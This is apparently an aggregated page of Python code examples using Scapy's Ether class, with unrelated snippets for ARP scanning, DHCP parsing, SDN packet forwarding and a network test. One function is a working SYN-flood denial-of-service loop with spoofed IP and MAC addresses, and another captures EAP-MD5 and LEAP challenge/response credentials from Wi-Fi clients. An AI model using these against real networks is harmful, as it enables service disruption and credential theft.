def set_custom_field_pcap(nb_fields, out_dir, packet_size=256):
pkt = Ether(src='0C:C4:7A:A3:25:34', dst='0C:C4:7A:A3:25:35') / PTP()
pkt /= add_layers(nb_fields, 1)
pkt = add_padding(pkt, packet_size)
wrpcap('%s/test.pcap' % out_dir, pkt)
python类Ether()的实例源码
def update_cache(self):
try:
ans, unans = arping(self._router_ip + "/24",
iface=self._interface, verbose=False)
self._arp_cache = []
if ans:
for s, r in ans:
self._arp_cache.append([r[ARP].psrc, r[Ether].src.lower()])
_LOGGER.debug("ARP cache: %s", self._arp_cache)
except Exception as e:
_LOGGER.error("Error when trying update ARP cache: %s", str(e))
def get_dhcp_mt(self, buff):
"""Pick out DHCP Message Type from buffer.
"""
ether_packet = scapy.Ether(buff)
dhcp_packet = ether_packet[scapy.DHCP]
# ('message-type', 1)
message = dhcp_packet.options[0]
return constants.DHCP_MESSATE_TYPE[message[1]]
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("please, remember to block your RST responses")
while True:
if forgeip:
pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
def cmd_arping(ip, iface, verbose):
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
conf.iface = iface
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)
res.show()
def parse_eap_packet(self, packet):
eap_layer = packet[EAP]
if eap_layer.type not in EAP_TYPES:
return
REQUEST, RESPONSE = 1, 2
# Means that we are the Access Point that the use is connecting to
if Ether in packet:
client_mac = packet[Ether].dst
elif self._packet_is_from_ap(packet):
client_mac = self._get_destination_from_packet(packet)
else:
client_mac = self._get_source_from_packet(packet)
if client_mac:
if client_mac not in self.wifi_clients:
self.wifi_clients[client_mac] = WiFiClient(client_mac)
else:
return
client = self.wifi_clients[client_mac]
client.user_id = eap_layer.id
if EAP_TYPES[eap_layer.type] == "ID" and eap_layer.code == RESPONSE:
client.identity = eap_layer.identity
elif EAP_TYPES[eap_layer.type] == "MD5":
auth_id = eap_layer.id
if auth_id not in client.authentications["MD5"]:
client.authentications["MD5"][auth_id] = ChallengeResponseAuth(auth_id, "MD5")
authentication = client.authentications["MD5"][auth_id]
if eap_layer.code == REQUEST:
authentication.challenge = eap_layer.load[1:17].encode("HEX")
elif packet[EAP].code == RESPONSE:
authentication.response = eap_layer.load[1:17].encode("HEX")
elif EAP_TYPES[eap_layer.type] == "LEAP":
auth_id = eap_layer.id
if auth_id not in client.authentications["LEAP"]:
client.authentications["LEAP"][auth_id] = ChallengeResponseAuth(auth_id, "LEAP")
authentication = client.authentications["LEAP"][auth_id]
leap_layer = packet[LEAP]
if leap_layer.name:
authentication.username = leap_layer.name
if eap_layer.code == REQUEST:
if len(leap_layer.data) == 8:
authentication.challenge = leap_layer.data.encode("HEX")
elif packet[EAP].code == RESPONSE:
if len(leap_layer.data) == 24:
authentication.response = eap_layer.data.encode("HEX")
client.check_and_log_credentials()
def runTest(self):
pkt = scapy2.Ether()
pkt /= scapy2.IP(src="21.0.0.2", dst="22.0.0.2")
pkt /= scapy2.TCP(dport = 80, flags="S", seq=42)
pkt /= ("badabadaboom")
t = Thread(target=self.Sniffer, args=("eth2",))
t.start()
scapy2.sendp(pkt, iface='eth2')
sleep(4)
# fail if no reply
if self.sniffed_cnt == 0:
self.assertTrue(False)
#res = scapy2.sniff(iface="eth2", timeout=3)
#print res
#if res:
# raise
#if reply:
# raise
#print "================______====\n"
#print reply
#print error
#print "================______====\n"
#if reply:
# reply.show()
#(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)
#send_packet(self, 0, pkt)
#(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)
# verify_packet(self, masked_exp_pkt, 1)
#mpkt = Mask(pkt)
#mpkt.set_do_not_care(0, 14*8)
#mpkt.set_do_not_care(16*8, 49*8)
#verify_packet(self, mpkt, 0)
#(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)
#print "================______====\n"
#y = 0
#for x in rcv_pkt:
# print "%d - %X" % (y, ord(x))
# y +=1
def packet_out(self, in_port, out_port, data):
in_port = "CONTROLLER" if in_port == ofp.OFPP_CONTROLLER else in_port
print "PACKET OUT (%s => %s): " % (in_port, out_port)
hexdump(data)
if self.in_out_iface is not None:
try:
# disect the packet
pkt = Ether(data)
# remove payload from Ether frame
payload = pkt.payload
payload_type = pkt.type
pkt.remove_payload()
# insert Dot1Q shim with vlan_id = out_port
if self.in_out_stag is None:
## WARNING -- This was changed from 0x88a8 to 0x8100 when
## testing with the Intel XL710 quad 10GE boards. The
## XL710 does not support the TPID for the STAG.
##
## Long term, it should be changed back to 0x88a8!
##
pkt.type = 0x8100
new_pkt = pkt / Dot1Q(vlan=out_port, type=payload_type) / payload
else:
pkt.type = 0x8100
new_pkt = (
pkt /
Dot1Q(vlan=self.in_out_stag, type=0x8100) /
Dot1Q(vlan=out_port, type=payload_type) /
payload)
# send out the packet
sendp(new_pkt, iface=self.in_out_iface)
except Exception, e:
logging.exception("Could not parse packet-out data as scapy.Ether:\n")
logging.error(hexdump(data, 'return'))
def forward_packet(self, pkt):
print "Received packet:"
hexdump(str(pkt))
pkt.show()
try:
assert isinstance(pkt, Ether)
assert isinstance(pkt.getlayer(1), Dot1Q)
dot1q = pkt.getlayer(1)
assert isinstance(dot1q, Dot1Q)
if self.in_out_stag is None:
payload = dot1q.payload
payload_type = dot1q.type
pkt.remove_payload()
pkt.type = payload_type
new_pkt = pkt / payload
in_port = dot1q.vlan
else:
if dot1q.vlan != self.in_out_stag:
print 'Dropping packet because outer tag %d does not match %d' % (
dot1q.vlan, self.in_out_stag)
return
dot1q_inner = dot1q.getlayer(1)
assert isinstance(dot1q_inner, Dot1Q)
payload = dot1q_inner.payload
payload_type = dot1q_inner.type
pkt.remove_payload()
pkt.type = payload_type
new_pkt = pkt / payload
in_port = dot1q_inner.vlan
if self.agent is not None:
self.agent.send_packet_in(str(new_pkt), in_port=in_port)
print 'new packet forwarded to controller (with in_port=%d):' % in_port
new_pkt.show()
except Exception, e:
logging.exception("Unexpected packet format received by InOutReceiver: %s" % e)
logging.error(hexdump(str(pkt), 'return'))